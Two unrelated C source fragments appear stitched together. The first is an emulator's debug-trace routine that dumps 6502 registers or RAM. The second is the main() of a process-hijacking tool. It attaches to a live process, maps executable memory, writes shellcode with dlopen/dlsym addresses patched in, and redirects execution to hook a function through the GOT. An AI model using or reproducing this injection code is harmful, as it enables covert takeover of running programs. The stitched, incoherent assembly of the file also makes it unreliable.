void CSystem::DebugTrace(int address) { char message[1024+1]; int count=0; sprintf(message,"%08x - DebugTrace(): ",gSystemCycleCount); count=strlen(message); if(address) { if(address==0xffff) { C6502_REGS regs; char linetext[1024]; // Register dump GetRegs(regs); sprintf(linetext,"PC=$%04x SP=$%02x PS=0x%02x A=0x%02x X=0x%02x Y=0x%02x",regs.PC,regs.SP, regs.PS,regs.A,regs.X,regs.Y); strcat(message,linetext); count=strlen(message); } else { // The RAM address contents should be dumped to an open debug file in this function do { message[count++]=Peek_RAM(address); } while(count<1024 && Peek_RAM(address++)!=0); } } else { strcat(message,"CPU Breakpoint"); count=strlen(message); } message[count]=0; // Callback to dump the message if(mpDebugCallback) { (*mpDebugCallback)(mDebugCallbackObject,message); } }
int main(int argc, char *argv[]) { HIJACK *hijack; FUNC *funcs, *func; unsigned long shellcode_addr, filename_addr, dlopen_addr, dlsym_addr, funcname_addr, pltgot_addr; struct stat sb; char *shellcode, *p1; int fd; struct user_regs_struct *regs, *backup; if (argc != 5) usage(argv[0]); hijack = InitHijack(); ToggleFlag(hijack, F_DEBUG); ToggleFlag(hijack, F_DEBUG_VERBOSE); AssignPid(hijack, atoi(argv[1])); if (Attach(hijack) != ERROR_NONE) { fprintf(stderr, "[-] Couldn't attach!\n"); exit(EXIT_FAILURE); } backup = GetRegs(hijack); regs = malloc(sizeof(struct user_regs_struct)); stat(argv[2], &sb); shellcode = malloc(sb.st_size); fd = open(argv[2], O_RDONLY); read(fd, shellcode, sb.st_size); close(fd); LocateAllFunctions(hijack); funcs = FindFunctionInLibraryByName(hijack, "/lib/libdl.so.2", "dlopen"); if (!(funcs)) { fprintf(stderr, "[-] Couldn't locate dlopen!\n"); exit(EXIT_FAILURE); } dlopen_addr = funcs->vaddr; printf("dlopen_addr: 0x%08lx\n", dlopen_addr); funcs = FindFunctionInLibraryByName(hijack, "/lib/libdl.so.2", "dlsym"); if (!(funcs)) { fprintf(stderr, "[-] Couldn't locate dlsym!\n"); exit(EXIT_FAILURE); } dlsym_addr = funcs->vaddr; printf("dlsym_addr: 0x%08lx\n", dlsym_addr); memcpy(regs, backup, sizeof(struct user_regs_struct)); LocateSystemCall(hijack); filename_addr = MapMemory(hijack, (unsigned long)NULL, 4096,PROT_READ | PROT_EXEC | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE); memcpy(regs, backup, sizeof(struct user_regs_struct)); p1 = memmem(shellcode, sb.st_size, "\x22\x22\x22\x22", 4); memcpy(p1, &filename_addr, 4); funcname_addr = filename_addr + strlen(argv[3]) + 1; shellcode_addr = funcname_addr + strlen(argv[4]) + 1; printf("filename_addr: 0x%08lx\n", filename_addr); printf("shellcode_addr: 0x%08lx\n", shellcode_addr); printf("esp: 0x%08lx\n", regs->esp); printf("eip: 0x%08lx\n", regs->eip); p1 = memmem(shellcode, sb.st_size, "\x33\x33\x33\x33", 4); memcpy(p1, &dlopen_addr, 4); p1 = memmem(shellcode, sb.st_size, "\x44\x44\x44\x44", 4); memcpy(p1, &funcname_addr, 4); p1 = memmem(shellcode, sb.st_size, "\x55\x55\x55\x55", 4); memcpy(p1, &dlsym_addr, 4); funcs = FindAllFunctionsByName(hijack, argv[4], false); for (func = funcs; func != NULL; func = func->next) { if (!(func->name)) continue; pltgot_addr = FindFunctionInGot(hijack, hijack->pltgot, func->vaddr); if (pltgot_addr > 0) break; } printf("pltgot_addr: 0x%08lx\n", pltgot_addr); p1 = memmem(shellcode, sb.st_size, "\x66\x66\x66\x66", 4); memcpy(p1, &pltgot_addr, 4); WriteData(hijack, filename_addr, (unsigned char *)argv[3], strlen(argv[3])); WriteData(hijack, funcname_addr, (unsigned char *)argv[4], strlen(argv[4])); WriteData(hijack, shellcode_addr, (unsigned char *)shellcode, sb.st_size); regs->esp -= 4; SetRegs(hijack, regs); WriteData(hijack, regs->esp, &(regs->eip), 4); regs->eip = shellcode_addr; if (regs->orig_eax >= 0) { switch (regs->eax) { case -514: /* -ERESTARTNOHAND */ case -512: /* -ERESTARTSYS */ case -513: /* -ERESTARTNOINTR */ case -516: /* -ERESTART_RESTARTBLOCK */ regs->eip += 2; break; } } SetRegs(hijack, regs); Detach(hijack); return 0; }